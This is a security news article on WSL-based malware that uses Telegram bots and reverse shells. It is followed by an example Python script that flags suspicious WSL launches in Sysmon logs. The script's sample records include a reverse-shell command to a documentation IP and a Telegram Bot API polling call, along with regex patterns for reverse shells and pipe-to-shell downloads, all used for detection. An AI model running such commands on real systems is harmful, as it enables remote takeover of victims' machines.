Attackers are taking a growing interest in the Windows Subsystem for Linux (WSL) as an attack surface for new malware. The most capable samples seen so far can spy on the victim and download further malicious modules. As the name suggests, WSL lets native Linux binaries run on Windows: WSL 1 translates Linux system calls onto the Windows kernel, while WSL 2 runs a real Linux kernel inside a lightweight virtual machine.
Recently discovered WSL-based malware samples reuse open-source code to route command-and-control traffic through the Telegram messaging service and give the threat actor remote access to the victim system. Researchers at Lumen Technologies’ Black Lotus Labs first identified malicious Linux binaries built for WSL over a year ago and published research on this new attack vector in September 2021. Although the samples are assembled from publicly available code, their number has grown steadily since then, and every variant has had a low detection rate.
Since last fall, Black Lotus Labs has tracked more than 100 WSL-based malware samples. Some are more sophisticated than others, and the researchers say threat actors “show continued interest” in the vector. Two of the samples stand out because they can act as a remote access tool (RAT) or open a reverse shell on the infected host.
The two samples turned up after a Black Lotus Labs report in March warned that WSL could become a favored attack surface for attackers of varying technical skill. One of the newer samples is built on RAT-via-Telegram Bot, an open-source Python tool that is controlled through a Telegram bot and includes functions for stealing authentication cookies from the Google Chrome and Opera browsers, running commands, and downloading files.
According to the Black Lotus Labs researchers, the sample shipped with a live bot token and chat ID, which indicates an operational command-and-control channel. This version can also take screenshots and collect user and system information (username, IP address, OS version), which helps the attacker decide which malware or tools to deploy in the next phase of the intrusion.
When Black Lotus Labs examined the sample, only two of the 57 antivirus engines on VirusTotal flagged it as malicious. A second WSL-based strain, identified recently, was built to open a reverse TCP shell on the compromised system so the attacker could interact with it. Its code connected back to an Amazon Web Services IP address that several businesses had used previously. This sample displayed a pop-up message in Turkish that read, “you’re screwed and there’s not much you can do.” Neither the message, which may hint at Turkish-speaking targets, nor the code gave any information about who wrote the malware.
Both modules, the researchers say, could be used for espionage and can download additional files to extend their capabilities. Black Lotus Labs had previously warned that threat actors were digging further into the WSL vector even though several samples it reviewed “did not yet appear to be fully functional due to the use of internal or non-routable IPs.” Malware authors have nonetheless made progress and already have variants that can upload and download files and execute attacker commands on both Windows and Linux.
Unlike earlier WSL-based malware, the newest variants Black Lotus Labs examined “would prove effective with an active C2 [command and control] infrastructure in place given the low detection rates of AV providers.” To defend against WSL-based attacks, monitor system activity with a tool such as Sysmon, look for suspicious process creation involving the WSL launchers, and review the command lines those processes were started with.
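As an added example that is not part of the article or of Black Lotus Labs’ research, the Python below sketches the kind of Sysmon-based triage the previous paragraph suggests. It reads process-creation (Event ID 1) records, constructed in-line to mirror Sysmon’s Image, CommandLine and ParentImage fields, and flags WSL launchers that were started from an unexpected parent or whose command line references the Telegram Bot API, a reverse shell, or a pipe-to-shell download. The launcher names, the expected-parent list, the regexes and the sample records are all this example’s own assumptions, not indicators published by the researchers.

```python
"""Triage Sysmon process-creation records (Event ID 1) for suspicious WSL use.

Hypothetical detection logic written for this article, not Black Lotus Labs'
tooling. Field names follow Sysmon's Event ID 1 schema (Image, CommandLine,
ParentImage); every value below is constructed for the example.
"""
import re

# Windows-side binaries that start or host a WSL distribution.
WSL_LAUNCHERS = {"wsl.exe", "bash.exe", "wslhost.exe"}
# Per-distribution launchers installed from the Store (ubuntu.exe, debian.exe, and so on).
DISTRO_LAUNCHER = re.compile(r"^(ubuntu\d*|debian|kali|opensuse\S*|alpine)\.exe$", re.I)

# Parents from which a person normally starts WSL. Assumption: anything else
# (an Office application, a browser, a script host) deserves a second look.
EXPECTED_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe",
                    "powershell.exe", "pwsh.exe", "code.exe"}

# Command-line patterns for the behaviours the article describes: Telegram Bot
# API control, a reverse shell, and pulling a script or binary from elsewhere.
# The regexes are this example's own.
SUSPICIOUS_CMDLINE = [
    ("telegram_bot_api", re.compile(r"api\.telegram\.org/bot", re.I)),
    ("reverse_shell", re.compile(r"(/dev/tcp/|\bnc\s+-e\b|bash\s+-i\s*>&)", re.I)),
    ("pipe_to_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|python3?)\b", re.I)),
    ("binary_on_windows_fs", re.compile(r"/mnt/[a-z]/\S+\.(elf|bin|out)\b", re.I)),
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_wsl_launch(event):
    img = basename(event.get("Image", ""))
    return img in WSL_LAUNCHERS or DISTRO_LAUNCHER.match(img) is not None


def assess(event):
    """Reasons an Event ID 1 record looks like WSL abuse; an empty list means no finding."""
    if event.get("EventID") != 1 or not is_wsl_launch(event):
        return []
    reasons = []
    parent = basename(event.get("ParentImage", ""))
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"unexpected_parent:{parent or 'unknown'}")
    cmdline = event.get("CommandLine", "")
    for label, pattern in SUSPICIOUS_CMDLINE:
        if pattern.search(cmdline):
            reasons.append(label)
    return reasons


def triage(events):
    """(index, reasons) for every record that produced at least one finding."""
    hits = []
    for i, event in enumerate(events):
        reasons = assess(event)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed records. Addresses are from the RFC 5737 documentation ranges.
SAMPLE_EVENTS = [
    # 0: a developer opens Ubuntu from Windows Terminal. Benign.
    {"EventID": 1, "Image": r"C:\Windows\System32\wsl.exe",
     "CommandLine": "wsl.exe -d Ubuntu",
     "ParentImage": r"C:\Users\alice\AppData\Local\Microsoft\WindowsApps\WindowsTerminal.exe"},
    # 1: Word spawns wsl.exe to open a reverse shell. Two findings.
    {"EventID": 1, "Image": r"C:\Windows\System32\wsl.exe",
     "CommandLine": 'wsl.exe -e bash -c "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1"',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    # 2: the Ubuntu launcher polls a Telegram bot for commands. One finding.
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Microsoft\WindowsApps\ubuntu.exe",
     "CommandLine": "ubuntu.exe run curl -s https://api.telegram.org/bot123456:EXAMPLE/getUpdates",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # 3: unrelated process creation, ignored.
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["CommandLine"], reasons)
```

One caveat when applying this on real hosts: with WSL 2 the Linux processes run inside the utility VM, so host-side Sysmon sees only the wsl.exe or distribution launcher and whatever was passed on its command line, not the processes the Linux binary spawns afterwards. The launcher’s parent and command line are therefore the main signals available from the Windows side, which is why the triage above concentrates on them.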